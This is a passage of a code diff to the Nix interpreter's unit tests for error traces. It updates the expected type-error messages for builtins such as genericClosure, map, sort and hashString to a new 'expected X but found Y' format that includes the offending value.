a/tests/unit/libexpr/error_traces.cc +++ b/tests/unit/libexpr/error_traces.cc @@ -105,7 +105,7 @@ namespace nix { TEST_F(ErrorTraceTest, genericClosure) { ASSERT_TRACE2("genericClosure 1", TypeError, - hintfmt("value is %s while a set was expected", "an integer"), + hintfmt("expected a set but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.genericClosure")); ASSERT_TRACE2("genericClosure {}", @@ -115,22 +115,22 @@ namespace nix { ASSERT_TRACE2("genericClosure { startSet = 1; }", TypeError, - hintfmt("value is %s while a list was expected", "an integer"), + hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the 'startSet' attribute passed as argument to builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = true; }", TypeError, - hintfmt("value is %s while a function was expected", "a Boolean"), + hintfmt("expected a function but found %s: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), hintfmt("while evaluating the 'operator' attribute passed as argument to builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = item: true; }", TypeError, - hintfmt("value is %s while a list was expected", "a Boolean"), + hintfmt("expected a list but found %s: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), hintfmt("while evaluating the return value of the `operator` passed to builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = item: [ true ]; }", TypeError, - hintfmt("value is %s while a set was expected", "a Boolean"), + hintfmt("expected a set but found %s: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), hintfmt("while evaluating one of the elements generated by (or initially passed to) builtins.genericClosure")); ASSERT_TRACE2("genericClosure { startSet = [{ key = 1;}]; operator = item: [ {} ]; }", @@ -145,7 +145,7 @@ namespace nix { ASSERT_TRACE2("genericClosure { startSet = [ true ]; operator = item: [{ key = ''a''; }]; }", TypeError, - hintfmt("value is %s while a set was expected", "a Boolean"), + hintfmt("expected a set but found %s: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), hintfmt("while evaluating one of the elements generated by (or initially passed to) builtins.genericClosure")); } @@ -154,12 +154,12 @@ namespace nix { TEST_F(ErrorTraceTest, replaceStrings) { ASSERT_TRACE2("replaceStrings 0 0 {}", TypeError, - hintfmt("value is %s while a list was expected", "an integer"), + hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "0" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.replaceStrings")); ASSERT_TRACE2("replaceStrings [] 0 {}", TypeError, - hintfmt("value is %s while a list was expected", "an integer"), + hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "0" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.replaceStrings")); ASSERT_TRACE1("replaceStrings [ 0 ] [] {}", @@ -168,17 +168,17 @@ namespace nix { ASSERT_TRACE2("replaceStrings [ 1 ] [ \"new\" ] {}", TypeError, - hintfmt("value is %s while a string was expected", "an integer"), + hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating one of the strings to replace passed to builtins.replaceStrings")); ASSERT_TRACE2("replaceStrings [ \"oo\" ] [ true ] \"foo\"", TypeError, - hintfmt("value is %s while a string was expected", "a Boolean"), + hintfmt("expected a string but found %s: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), hintfmt("while evaluating one of the replacement strings passed to builtins.replaceStrings")); ASSERT_TRACE2("replaceStrings [ \"old\" ] [ \"new\" ] {}", TypeError, - hintfmt("value is %s while a string was expected", "a set"), + hintfmt("expected a string but found %s: %s", "a set", "{ }"), hintfmt("while evaluating the third argument passed to builtins.replaceStrings")); } @@ -243,7 +243,7 @@ namespace nix { TEST_F(ErrorTraceTest, ceil) { ASSERT_TRACE2("ceil \"foo\"", TypeError, - hintfmt("value is %s while a float was expected", "a string"), + hintfmt("expected a float but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.ceil")); } @@ -252,7 +252,7 @@ namespace nix { TEST_F(ErrorTraceTest, floor) { ASSERT_TRACE2("floor \"foo\"", TypeError, - hintfmt("value is %s while a float was expected", "a string"), + hintfmt("expected a float but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.floor")); } @@ -265,7 +265,7 @@ namespace nix { TEST_F(ErrorTraceTest, getEnv) { ASSERT_TRACE2("getEnv [ ]", TypeError, - hintfmt("value is %s while a string was expected", "a list"), + hintfmt("expected a string but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the first argument passed to builtins.getEnv")); } @@ -286,7 +286,7 @@ namespace nix { TEST_F(ErrorTraceTest, placeholder) { ASSERT_TRACE2("placeholder []", TypeError, - hintfmt("value is %s while a string was expected", "a list"), + hintfmt("expected a string but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the first argument passed to builtins.placeholder")); } @@ -387,7 +387,7 @@ namespace nix { ASSERT_TRACE2("filterSource [] ./.", TypeError, - hintfmt("value is %s while a function was expected", "a list"), + hintfmt("expected a function but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the first argument passed to builtins.filterSource")); // Usupported by store "dummy" @@ -399,7 +399,7 @@ namespace nix { // ASSERT_TRACE2("filterSource (_: _: 1) ./.", // TypeError, - // hintfmt("value is %s while a Boolean was expected", "an integer"), + // hintfmt("expected a Boolean but found %s: %s", "an integer", "1"), // hintfmt("while evaluating the return value of the path filter function")); } @@ -412,7 +412,7 @@ namespace nix { TEST_F(ErrorTraceTest, attrNames) { ASSERT_TRACE2("attrNames []", TypeError, - hintfmt("value is %s while a set was expected", "a list"), + hintfmt("expected a set but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the argument passed to builtins.attrNames")); } @@ -421,7 +421,7 @@ namespace nix { TEST_F(ErrorTraceTest, attrValues) { ASSERT_TRACE2("attrValues []", TypeError, - hintfmt("value is %s while a set was expected", "a list"), + hintfmt("expected a set but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the argument passed to builtins.attrValues")); } @@ -430,12 +430,12 @@ namespace nix { TEST_F(ErrorTraceTest, getAttr) { ASSERT_TRACE2("getAttr [] []", TypeError, - hintfmt("value is %s while a string was expected", "a list"), + hintfmt("expected a string but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the first argument passed to builtins.getAttr")); ASSERT_TRACE2("getAttr \"foo\" []", TypeError, - hintfmt("value is %s while a set was expected", "a list"), + hintfmt("expected a set but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the second argument passed to builtins.getAttr")); ASSERT_TRACE2("getAttr \"foo\" {}", @@ -453,12 +453,12 @@ namespace nix { TEST_F(ErrorTraceTest, hasAttr) { ASSERT_TRACE2("hasAttr [] []", TypeError, - hintfmt("value is %s while a string was expected", "a list"), + hintfmt("expected a string but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the first argument passed to builtins.hasAttr")); ASSERT_TRACE2("hasAttr \"foo\" []", TypeError, - hintfmt("value is %s while a set was expected", "a list"), + hintfmt("expected a set but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the second argument passed to builtins.hasAttr")); } @@ -471,17 +471,17 @@ namespace nix { TEST_F(ErrorTraceTest, removeAttrs) { ASSERT_TRACE2("removeAttrs \"\" \"\"", TypeError, - hintfmt("value is %s while a set was expected", "a string"), + hintfmt("expected a set but found %s: %s", "a string", ANSI_MAGENTA "\"\"" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.removeAttrs")); ASSERT_TRACE2("removeAttrs \"\" [ 1 ]", TypeError, - hintfmt("value is %s while a set was expected", "a string"), + hintfmt("expected a set but found %s: %s", "a string", ANSI_MAGENTA "\"\"" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.removeAttrs")); ASSERT_TRACE2("removeAttrs \"\" [ \"1\" ]", TypeError, - hintfmt("value is %s while a set was expected", "a string"), + hintfmt("expected a set but found %s: %s", "a string", ANSI_MAGENTA "\"\"" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.removeAttrs")); } @@ -490,12 +490,12 @@ namespace nix { TEST_F(ErrorTraceTest, listToAttrs) { ASSERT_TRACE2("listToAttrs 1", TypeError, - hintfmt("value is %s while a list was expected", "an integer"), + hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the argument passed to builtins.listToAttrs")); ASSERT_TRACE2("listToAttrs [ 1 ]", TypeError, - hintfmt("value is %s while a set was expected", "an integer"), + hintfmt("expected a set but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating an element of the list passed to builtins.listToAttrs")); ASSERT_TRACE2("listToAttrs [ {} ]", @@ -505,7 +505,7 @@ namespace nix { ASSERT_TRACE2("listToAttrs [ { name = 1; } ]", TypeError, - hintfmt("value is %s while a string was expected", "an integer"), + hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the `name` attribute of an element of the list passed to builtins.listToAttrs")); ASSERT_TRACE2("listToAttrs [ { name = \"foo\"; } ]", @@ -519,12 +519,12 @@ namespace nix { TEST_F(ErrorTraceTest, intersectAttrs) { ASSERT_TRACE2("intersectAttrs [] []", TypeError, - hintfmt("value is %s while a set was expected", "a list"), + hintfmt("expected a set but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the first argument passed to builtins.intersectAttrs")); ASSERT_TRACE2("intersectAttrs {} []", TypeError, - hintfmt("value is %s while a set was expected", "a list"), + hintfmt("expected a set but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the second argument passed to builtins.intersectAttrs")); } @@ -533,22 +533,22 @@ namespace nix { TEST_F(ErrorTraceTest, catAttrs) { ASSERT_TRACE2("catAttrs [] {}", TypeError, - hintfmt("value is %s while a string was expected", "a list"), + hintfmt("expected a string but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the first argument passed to builtins.catAttrs")); ASSERT_TRACE2("catAttrs \"foo\" {}", TypeError, - hintfmt("value is %s while a list was expected", "a set"), + hintfmt("expected a list but found %s: %s", "a set", "{ }"), hintfmt("while evaluating the second argument passed to builtins.catAttrs")); ASSERT_TRACE2("catAttrs \"foo\" [ 1 ]", TypeError, - hintfmt("value is %s while a set was expected", "an integer"), + hintfmt("expected a set but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating an element in the list passed as second argument to builtins.catAttrs")); ASSERT_TRACE2("catAttrs \"foo\" [ { foo = 1; } 1 { bar = 5;} ]", TypeError, - hintfmt("value is %s while a set was expected", "an integer"), + hintfmt("expected a set but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating an element in the list passed as second argument to builtins.catAttrs")); } @@ -565,7 +565,7 @@ namespace nix { TEST_F(ErrorTraceTest, mapAttrs) { ASSERT_TRACE2("mapAttrs [] []", TypeError, - hintfmt("value is %s while a set was expected", "a list"), + hintfmt("expected a set but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the second argument passed to builtins.mapAttrs")); // XXX: defered @@ -590,12 +590,12 @@ namespace nix { TEST_F(ErrorTraceTest, zipAttrsWith) { ASSERT_TRACE2("zipAttrsWith [] [ 1 ]", TypeError, - hintfmt("value is %s while a function was expected", "a list"), + hintfmt("expected a function but found %s: %s", "a list", "[ ]"), hintfmt("while evaluating the first argument passed to builtins.zipAttrsWith")); ASSERT_TRACE2("zipAttrsWith (_: 1) [ 1 ]", TypeError, - hintfmt("value is %s while a set was expected", "an integer"), + hintfmt("expected a set but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating a value of the list passed as second argument to builtins.zipAttrsWith")); // XXX: How to properly tell that the fucntion takes two arguments ? @@ -622,7 +622,7 @@ namespace nix { TEST_F(ErrorTraceTest, elemAt) { ASSERT_TRACE2("elemAt \"foo\" (-1)", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.elemAt")); ASSERT_TRACE1("elemAt [] (-1)", @@ -639,7 +639,7 @@ namespace nix { TEST_F(ErrorTraceTest, head) { ASSERT_TRACE2("head 1", TypeError, - hintfmt("value is %s while a list was expected", "an integer"), + hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.elemAt")); ASSERT_TRACE1("head []", @@ -652,7 +652,7 @@ namespace nix { TEST_F(ErrorTraceTest, tail) { ASSERT_TRACE2("tail 1", TypeError, - hintfmt("value is %s while a list was expected", "an integer"), + hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.tail")); ASSERT_TRACE1("tail []", @@ -665,12 +665,12 @@ namespace nix { TEST_F(ErrorTraceTest, map) { ASSERT_TRACE2("map 1 \"foo\"", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.map")); ASSERT_TRACE2("map 1 [ 1 ]", TypeError, - hintfmt("value is %s while a function was expected", "an integer"), + hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.map")); } @@ -679,17 +679,17 @@ namespace nix { TEST_F(ErrorTraceTest, filter) { ASSERT_TRACE2("filter 1 \"foo\"", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.filter")); ASSERT_TRACE2("filter 1 [ \"foo\" ]", TypeError, - hintfmt("value is %s while a function was expected", "an integer"), + hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.filter")); ASSERT_TRACE2("filter (_: 5) [ \"foo\" ]", TypeError, - hintfmt("value is %s while a Boolean was expected", "an integer"), + hintfmt("expected a Boolean but found %s: %s", "an integer", ANSI_CYAN "5" ANSI_NORMAL), hintfmt("while evaluating the return value of the filtering function passed to builtins.filter")); } @@ -698,7 +698,7 @@ namespace nix { TEST_F(ErrorTraceTest, elem) { ASSERT_TRACE2("elem 1 \"foo\"", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.elem")); } @@ -707,17 +707,17 @@ namespace nix { TEST_F(ErrorTraceTest, concatLists) { ASSERT_TRACE2("concatLists 1", TypeError, - hintfmt("value is %s while a list was expected", "an integer"), + hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.concatLists")); ASSERT_TRACE2("concatLists [ 1 ]", TypeError, - hintfmt("value is %s while a list was expected", "an integer"), + hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating a value of the list passed to builtins.concatLists")); ASSERT_TRACE2("concatLists [ [1] \"foo\" ]", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating a value of the list passed to builtins.concatLists")); } @@ -726,12 +726,12 @@ namespace nix { TEST_F(ErrorTraceTest, length) { ASSERT_TRACE2("length 1", TypeError, - hintfmt("value is %s while a list was expected", "an integer"), + hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.length")); ASSERT_TRACE2("length \"foo\"", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.length")); } @@ -740,12 +740,12 @@ namespace nix { TEST_F(ErrorTraceTest, foldlPrime) { ASSERT_TRACE2("foldl' 1 \"foo\" true", TypeError, - hintfmt("value is %s while a function was expected", "an integer"), + hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.foldlStrict")); ASSERT_TRACE2("foldl' (_: 1) \"foo\" true", TypeError, - hintfmt("value is %s while a list was expected", "a Boolean"), + hintfmt("expected a list but found %s: %s", "a Boolean", ANSI_CYAN "true" ANSI_NORMAL), hintfmt("while evaluating the third argument passed to builtins.foldlStrict")); ASSERT_TRACE1("foldl' (_: 1) \"foo\" [ true ]", @@ -754,7 +754,7 @@ namespace nix { ASSERT_TRACE2("foldl' (a: b: a && b) \"foo\" [ true ]", TypeError, - hintfmt("value is %s while a Boolean was expected", "a string"), + hintfmt("expected a Boolean but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("in the left operand of the AND (&&) operator")); } @@ -763,17 +763,17 @@ namespace nix { TEST_F(ErrorTraceTest, any) { ASSERT_TRACE2("any 1 \"foo\"", TypeError, - hintfmt("value is %s while a function was expected", "an integer"), + hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.any")); ASSERT_TRACE2("any (_: 1) \"foo\"", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.any")); ASSERT_TRACE2("any (_: 1) [ \"foo\" ]", TypeError, - hintfmt("value is %s while a Boolean was expected", "an integer"), + hintfmt("expected a Boolean but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the return value of the function passed to builtins.any")); } @@ -782,17 +782,17 @@ namespace nix { TEST_F(ErrorTraceTest, all) { ASSERT_TRACE2("all 1 \"foo\"", TypeError, - hintfmt("value is %s while a function was expected", "an integer"), + hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.all")); ASSERT_TRACE2("all (_: 1) \"foo\"", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.all")); ASSERT_TRACE2("all (_: 1) [ \"foo\" ]", TypeError, - hintfmt("value is %s while a Boolean was expected", "an integer"), + hintfmt("expected a Boolean but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the return value of the function passed to builtins.all")); } @@ -801,12 +801,12 @@ namespace nix { TEST_F(ErrorTraceTest, genList) { ASSERT_TRACE2("genList 1 \"foo\"", TypeError, - hintfmt("value is %s while an integer was expected", "a string"), + hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.genList")); ASSERT_TRACE2("genList 1 2", TypeError, - hintfmt("value is %s while a function was expected", "an integer"), + hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.genList", "an integer")); // XXX: defered @@ -825,12 +825,12 @@ namespace nix { TEST_F(ErrorTraceTest, sort) { ASSERT_TRACE2("sort 1 \"foo\"", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.sort")); ASSERT_TRACE2("sort 1 [ \"foo\" ]", TypeError, - hintfmt("value is %s while a function was expected", "an integer"), + hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.sort")); ASSERT_TRACE1("sort (_: 1) [ \"foo\" \"bar\" ]", @@ -839,7 +839,7 @@ namespace nix { ASSERT_TRACE2("sort (_: _: 1) [ \"foo\" \"bar\" ]", TypeError, - hintfmt("value is %s while a Boolean was expected", "an integer"), + hintfmt("expected a Boolean but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the return value of the sorting function passed to builtins.sort")); // XXX: Trace too deep, need better asserts @@ -857,17 +857,17 @@ namespace nix { TEST_F(ErrorTraceTest, partition) { ASSERT_TRACE2("partition 1 \"foo\"", TypeError, - hintfmt("value is %s while a function was expected", "an integer"), + hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.partition")); ASSERT_TRACE2("partition (_: 1) \"foo\"", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.partition")); ASSERT_TRACE2("partition (_: 1) [ \"foo\" ]", TypeError, - hintfmt("value is %s while a Boolean was expected", "an integer"), + hintfmt("expected a Boolean but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the return value of the partition function passed to builtins.partition")); } @@ -876,17 +876,17 @@ namespace nix { TEST_F(ErrorTraceTest, groupBy) { ASSERT_TRACE2("groupBy 1 \"foo\"", TypeError, - hintfmt("value is %s while a function was expected", "an integer"), + hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.groupBy")); ASSERT_TRACE2("groupBy (_: 1) \"foo\"", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.groupBy")); ASSERT_TRACE2("groupBy (x: x) [ \"foo\" \"bar\" 1 ]", TypeError, - hintfmt("value is %s while a string was expected", "an integer"), + hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the return value of the grouping function passed to builtins.groupBy")); } @@ -895,22 +895,22 @@ namespace nix { TEST_F(ErrorTraceTest, concatMap) { ASSERT_TRACE2("concatMap 1 \"foo\"", TypeError, - hintfmt("value is %s while a function was expected", "an integer"), + hintfmt("expected a function but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.concatMap")); ASSERT_TRACE2("concatMap (x: 1) \"foo\"", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.concatMap")); ASSERT_TRACE2("concatMap (x: 1) [ \"foo\" ] # TODO", TypeError, - hintfmt("value is %s while a list was expected", "an integer"), + hintfmt("expected a list but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the return value of the function passed to builtins.concatMap")); ASSERT_TRACE2("concatMap (x: \"foo\") [ 1 2 ] # TODO", TypeError, - hintfmt("value is %s while a list was expected", "a string"), + hintfmt("expected a list but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the return value of the function passed to builtins.concatMap")); } @@ -919,12 +919,12 @@ namespace nix { TEST_F(ErrorTraceTest, add) { ASSERT_TRACE2("add \"foo\" 1", TypeError, - hintfmt("value is %s while an integer was expected", "a string"), + hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the first argument of the addition")); ASSERT_TRACE2("add 1 \"foo\"", TypeError, - hintfmt("value is %s while an integer was expected", "a string"), + hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument of the addition")); } @@ -933,12 +933,12 @@ namespace nix { TEST_F(ErrorTraceTest, sub) { ASSERT_TRACE2("sub \"foo\" 1", TypeError, - hintfmt("value is %s while an integer was expected", "a string"), + hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the first argument of the subtraction")); ASSERT_TRACE2("sub 1 \"foo\"", TypeError, - hintfmt("value is %s while an integer was expected", "a string"), + hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument of the subtraction")); } @@ -947,12 +947,12 @@ namespace nix { TEST_F(ErrorTraceTest, mul) { ASSERT_TRACE2("mul \"foo\" 1", TypeError, - hintfmt("value is %s while an integer was expected", "a string"), + hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the first argument of the multiplication")); ASSERT_TRACE2("mul 1 \"foo\"", TypeError, - hintfmt("value is %s while an integer was expected", "a string"), + hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument of the multiplication")); } @@ -961,12 +961,12 @@ namespace nix { TEST_F(ErrorTraceTest, div) { ASSERT_TRACE2("div \"foo\" 1 # TODO: an integer was expected -> a number", TypeError, - hintfmt("value is %s while an integer was expected", "a string"), + hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the first operand of the division")); ASSERT_TRACE2("div 1 \"foo\"", TypeError, - hintfmt("value is %s while a float was expected", "a string"), + hintfmt("expected a float but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second operand of the division")); ASSERT_TRACE1("div \"foo\" 0", @@ -979,12 +979,12 @@ namespace nix { TEST_F(ErrorTraceTest, bitAnd) { ASSERT_TRACE2("bitAnd 1.1 2", TypeError, - hintfmt("value is %s while an integer was expected", "a float"), + hintfmt("expected an integer but found %s: %s", "a float", ANSI_CYAN "1.1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.bitAnd")); ASSERT_TRACE2("bitAnd 1 2.2", TypeError, - hintfmt("value is %s while an integer was expected", "a float"), + hintfmt("expected an integer but found %s: %s", "a float", ANSI_CYAN "2.2" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.bitAnd")); } @@ -993,12 +993,12 @@ namespace nix { TEST_F(ErrorTraceTest, bitOr) { ASSERT_TRACE2("bitOr 1.1 2", TypeError, - hintfmt("value is %s while an integer was expected", "a float"), + hintfmt("expected an integer but found %s: %s", "a float", ANSI_CYAN "1.1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.bitOr")); ASSERT_TRACE2("bitOr 1 2.2", TypeError, - hintfmt("value is %s while an integer was expected", "a float"), + hintfmt("expected an integer but found %s: %s", "a float", ANSI_CYAN "2.2" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.bitOr")); } @@ -1007,12 +1007,12 @@ namespace nix { TEST_F(ErrorTraceTest, bitXor) { ASSERT_TRACE2("bitXor 1.1 2", TypeError, - hintfmt("value is %s while an integer was expected", "a float"), + hintfmt("expected an integer but found %s: %s", "a float", ANSI_CYAN "1.1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.bitXor")); ASSERT_TRACE2("bitXor 1 2.2", TypeError, - hintfmt("value is %s while an integer was expected", "a float"), + hintfmt("expected an integer but found %s: %s", "a float", ANSI_CYAN "2.2" ANSI_NORMAL), hintfmt("while evaluating the second argument passed to builtins.bitXor")); } @@ -1047,12 +1047,12 @@ namespace nix { TEST_F(ErrorTraceTest, substring) { ASSERT_TRACE2("substring {} \"foo\" true", TypeError, - hintfmt("value is %s while an integer was expected", "a set"), + hintfmt("expected an integer but found %s: %s", "a set", "{ }"), hintfmt("while evaluating the first argument (the start offset) passed to builtins.substring")); ASSERT_TRACE2("substring 3 \"foo\" true", TypeError, - hintfmt("value is %s while an integer was expected", "a string"), + hintfmt("expected an integer but found %s: %s", "a string", ANSI_MAGENTA "\"foo\"" ANSI_NORMAL), hintfmt("while evaluating the second argument (the substring length) passed to builtins.substring")); ASSERT_TRACE2("substring 0 3 {}", @@ -1079,7 +1079,7 @@ namespace nix { TEST_F(ErrorTraceTest, hashString) { ASSERT_TRACE2("hashString 1 {}", TypeError, - hintfmt("value is %s while a string was expected", "an integer"), + hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.hashString")); ASSERT_TRACE1("hashString \"foo\" \"content\"", @@ -1088,7 +1088,7 @@ namespace nix { ASSERT_TRACE2("hashString \"sha256\" {}", TypeError, - hintfmt("value is %s while a string was expected", "a set"), + hintfmt("expected a string but found %s: %s", "a set", "{ }"), hintfmt("while evaluating the second argument passed to builtins.hashString")); } @@ -1097,12 +1097,12 @@ namespace nix { TEST_F(ErrorTraceTest, match) { ASSERT_TRACE2("match 1 {}", TypeError, - hintfmt("value is %s while a string was expected", "an integer"), + hintfmt("expected a string but found %s: %s", "an integer", ANSI_CYAN "1" ANSI_NORMAL), hintfmt("while evaluating the first argument passed to builtins.match")); ASSERT_TRACE2("match \"foo\" {}", TypeError, - hintfmt("value is %s while a string was expected", "a set"), + hintfmt("expected a string but found %s: %s", "a set", "{ }"), hintfmt("while 